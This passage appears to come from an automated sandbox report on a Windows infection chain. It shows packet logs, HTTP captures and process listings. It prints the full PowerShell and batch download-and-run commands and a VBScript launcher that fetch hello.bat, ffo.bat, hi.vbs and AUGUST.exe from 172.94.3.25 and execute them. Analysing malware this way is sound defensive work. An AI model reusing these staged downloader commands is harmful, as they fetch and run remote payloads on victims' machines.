                                        Sep 25, 2024 18:40:31.937982082 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.937999010 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938025951 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938039064 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.938043118 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938059092 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938076973 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938082933 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.938093901 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938111067 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938118935 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.938127041 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938143969 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938143969 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.938160896 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938177109 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938194990 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938199997 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.938213110 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938225985 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.938254118 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.938301086 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938318014 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938333988 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938350916 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938358068 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.938393116 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.938395023 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938412905 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938430071 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938446045 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938453913 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.938462973 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938499928 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.938700914 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938719034 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938735962 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938796997 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.938796997 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.938798904 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938816071 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938832998 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938849926 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938860893 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.938891888 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.938956976 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938972950 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.938990116 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939004898 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939013004 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.939023018 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939038038 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939043045 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.939054966 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939080954 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.939090014 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939105988 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939131975 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939146996 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939155102 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.939162970 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.939163923 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939182043 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939198971 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.939205885 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939223051 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939244986 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.939338923 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939378977 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939419031 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.939424038 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939454079 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939461946 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.939471006 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939487934 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939505100 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939517975 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.939543962 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.939599991 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939616919 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939632893 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939650059 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939666033 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939668894 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.939682961 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939692974 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.939699888 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939717054 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939724922 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.939734936 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939749956 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.939791918 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939814091 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939830065 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939846992 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939851999 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.939867020 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939878941 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.939883947 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939907074 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.939925909 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939941883 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939956903 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939971924 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.939980984 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.939987898 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.940006971 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.940026999 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.156796932 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.162317038 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.199556112 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.199624062 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.201394081 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.201427937 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.201441050 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.201479912 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.201525927 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.201539040 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.201550007 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.201564074 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.201584101 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.201587915 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.201596975 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.201611042 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.201625109 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.201633930 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.201637983 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.201666117 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.201695919 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.201705933 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.201718092 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.201730013 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.201741934 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.201756954 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.201772928 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.201801062 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.201898098 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.201910019 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.201921940 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.201934099 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.201944113 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.201946020 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.201956034 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.201966047 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.201968908 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.201980114 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.201992989 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.201998949 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.202004910 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202018976 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202032089 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202034950 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.202054024 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.202177048 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202189922 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202200890 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202213049 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202217102 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.202224016 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202235937 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202236891 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.202246904 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202259064 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202265024 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.202271938 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202284098 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.202292919 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202303886 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202313900 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202318907 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.202328920 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202337027 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.202342987 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202366114 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.202477932 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202491045 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202502966 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202513933 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202524900 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.202526093 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202543020 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202555895 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202563047 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.202567101 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202584028 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.202588081 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202599049 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202600956 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.202610016 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202625036 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.202630043 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202641964 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202651978 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:32.202651978 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202663898 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:32.202677965 CEST4971680192.168.2.6172.94.3.25
                                        • 172.94.3.25
                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        0 | 192.168.2.6 | 49712 | 172.94.3.25 | 80 | 1780 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 25, 2024 18:40:19.820483923 CEST | 165 | OUT | GET /hello.bat HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                        Host: 172.94.3.25
                                        Connection: Keep-Alive
                                        Sep 25, 2024 18:40:20.474911928 CEST | 471 | IN | HTTP/1.1 200 OK
                                        Content-Length: 191
                                        Last-Modified: Wed, 25 Sep 2024 10:20:05 GMT
                                        Content-Type: text/plain
                                        Date: Wed, 25 Sep 2024 16:40:20 GMT
                                        ETag: "61c1b5c0651739d6d3bd507f4edc42b8-1727259605-191"
                                        Accept-Ranges: bytes
                                        Server: WsgiDAV/4.3.3 Cheroot/10.0.1 Python/3.12.2
                                        Data Raw: 40 65 63 68 6f 20 6f 66 66 0d 0a 70 6f 77 65 72 73 68 65 6c 6c 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 32 2e 39 34 2e 33 2e 32 35 2f 66 66 6f 2e 62 61 74 20 2d 4f 75 74 46 69 6c 65 20 25 41 50 50 44 41 54 41 25 2f 66 66 6f 2e 62 61 74 0d 0a 70 6f 77 65 72 73 68 65 6c 6c 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 32 2e 39 34 2e 33 2e 32 35 2f 68 69 2e 76 62 73 20 2d 4f 75 74 46 69 6c 65 20 25 41 50 50 44 41 54 41 25 2f 68 69 2e 76 62 73 0d 0a 73 74 61 72 74 20 2f 6d 69 6e 20 63 6d 64 20 2f 63 20 25 41 50 50 44 41 54 41 25 2f 68 69 2e 76 62 73 0d 0a 65 78 69 74
                                        Data Ascii:
                                        @echo off
                                        powershell wget http://172.94.3.25/ffo.bat -OutFile %APPDATA%/ffo.bat
                                        powershell wget http://172.94.3.25/hi.vbs -OutFile %APPDATA%/hi.vbs
                                        start /min cmd /c %APPDATA%/hi.vbs
                                        exit


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        1 | 192.168.2.6 | 49713 | 172.94.3.25 | 80 | 1584 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 25, 2024 18:40:21.193124056 CEST | 163 | OUT | GET /ffo.bat HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                        Host: 172.94.3.25
                                        Connection: Keep-Alive
                                        Sep 25, 2024 18:40:21.857218027 CEST | 280 | IN | HTTP/1.1 200 OK
                                        Content-Length: 116
                                        Last-Modified: Wed, 25 Sep 2024 10:10:11 GMT
                                        Content-Type: text/plain
                                        Date: Wed, 25 Sep 2024 16:40:21 GMT
                                        ETag: "df2e60705fdf43715c85c86652fee62b-1727259011-116"
                                        Accept-Ranges: bytes
                                        Server: WsgiDAV/4.3.3 Cheroot/10.0.1 Python/3.12.2
                                        Sep 25, 2024 18:40:22.006005049 CEST116INData Raw: 40 65 63 68 6f 20 6f 66 66 0d 0a 70 6f 77 65 72 73 68 65 6c 6c 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 32 2e 39 34 2e 33 2e 32 35 2f 41 55 47 55 53 54 2e 65 78 65 20 2d 4f 75 74 46 69 6c 65 20 25 41 50 50 44 41 54 41 25 2f 41 55 47 55 53 54
                                        Data Ascii:
                                        @echo off
                                        powershell wget http://172.94.3.25/AUGUST.exe -OutFile %APPDATA%/AUGUST.exe
                                        start %APPDATA%/AUGUST.exe


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        2 | 192.168.2.6 | 49714 | 172.94.3.25 | 80 | 6600 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 25, 2024 18:40:24.072037935 CEST | 162 | OUT | GET /hi.vbs HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                        Host: 172.94.3.25
                                        Connection: Keep-Alive
                                        Sep 25, 2024 18:40:24.737482071 CEST | 420 | IN | HTTP/1.1 200 OK
                                        Content-Length: 126
                                        Last-Modified: Wed, 25 Sep 2024 10:18:03 GMT
                                        Content-Type: application/octet-stream
                                        Date: Wed, 25 Sep 2024 16:40:24 GMT
                                        ETag: "5374c228c78d8b24803c35ae359f5b7e-1727259483-126"
                                        Accept-Ranges: bytes
                                        Server: WsgiDAV/4.3.3 Cheroot/10.0.1 Python/3.12.2
                                        Data Raw: 53 65 74 20 57 73 68 53 68 65 6c 6c 20 3d 20 43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 57 53 63 72 69 70 74 2e 53 68 65 6c 6c 22 29 20 0d 0a 57 73 68 53 68 65 6c 6c 2e 52 75 6e 20 63 68 72 28 33 34 29 20 26 20 22 25 41 50 50 44 41 54 41 25 2f 66 66 6f 2e 62 61 74 22 20 26 20 43 68 72 28 33 34 29 2c 20 30 0d 0a 53 65 74 20 57 73 68 53 68 65 6c 6c 20 3d 20 4e 6f 74 68 69 6e 67
                                        Data Ascii:
                                        Set WshShell = CreateObject("WScript.Shell")
                                        WshShell.Run chr(34) & "%APPDATA%/ffo.bat" & Chr(34), 0
                                        Set WshShell = Nothing


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        3 | 192.168.2.6 | 49716 | 172.94.3.25 | 80 | 4904 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 25, 2024 18:40:27.133619070 CEST | 166 | OUT | GET /AUGUST.exe HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                        Host: 172.94.3.25
                                        Connection: Keep-Alive
                                        Sep 25, 2024 18:40:27.767301083 CEST | 1236 | IN | HTTP/1.1 200 OK
                                        Content-Length: 4809996
                                        Last-Modified: Wed, 25 Sep 2024 11:52:30 GMT
                                        Content-Type: application/x-msdownload
                                        Date: Wed, 25 Sep 2024 16:40:27 GMT
                                        ETag: "f30293f7a768b837cdb37fc8b138e7a1-1727265150-4809996"
                                        Accept-Ranges: bytes
                                        Server: WsgiDAV/4.3.3 Cheroot/10.0.1 Python/3.12.2


                                        Target ID:0
                                        Start time:12:40:16
                                        Start date:25/09/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\cmd.exe" /c powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat && C:\Users\user\AppData\Roaming/hello.bat
                                        Imagebase:0x7ff68f0f0000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:1
                                        Start time:12:40:16
                                        Start date:25/09/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:3
                                        Start time:12:40:16
                                        Start date:25/09/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat
                                        Imagebase:0x7ff6e3d50000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:4
                                        Start time:12:40:19
                                        Start date:25/09/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.bat
                                        Imagebase:0x7ff6e3d50000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:5
                                        Start time:12:40:21
                                        Start date:25/09/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:powershell wget http://172.94.3.25/hi.vbs -OutFile C:\Users\user\AppData\Roaming/hi.vbs
                                        Imagebase:0x7ff6e3d50000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:6
                                        Start time:12:40:23
                                        Start date:25/09/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c C:\Users\user\AppData\Roaming/hi.vbs
                                        Imagebase:0x7ff68f0f0000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:7
                                        Start time:12:40:23
                                        Start date:25/09/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:8
                                        Start time:12:40:24
                                        Start date:25/09/2024
                                        Path:C:\Windows\System32\wscript.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hi.vbs"
                                        Imagebase:0x7ff7228c0000
                                        File size:170'496 bytes
                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:9
                                        Start time:12:40:25
                                        Start date:25/09/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ffo.bat" "
                                        Imagebase:0x7ff68f0f0000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:10
                                        Start time:12:40:25
                                        Start date:25/09/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:11
                                        Start time:12:40:25
                                        Start date:25/09/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:powershell wget http://172.94.3.25/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/AUGUST.exe
                                        Imagebase:0x7ff6e3d50000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:16
                                        Start time:12:40:31
                                        Start date:25/09/2024
                                        Path:C:\Users\user\AppData\Roaming\AUGUST.exe
                                        Wow64 process (32bit):true
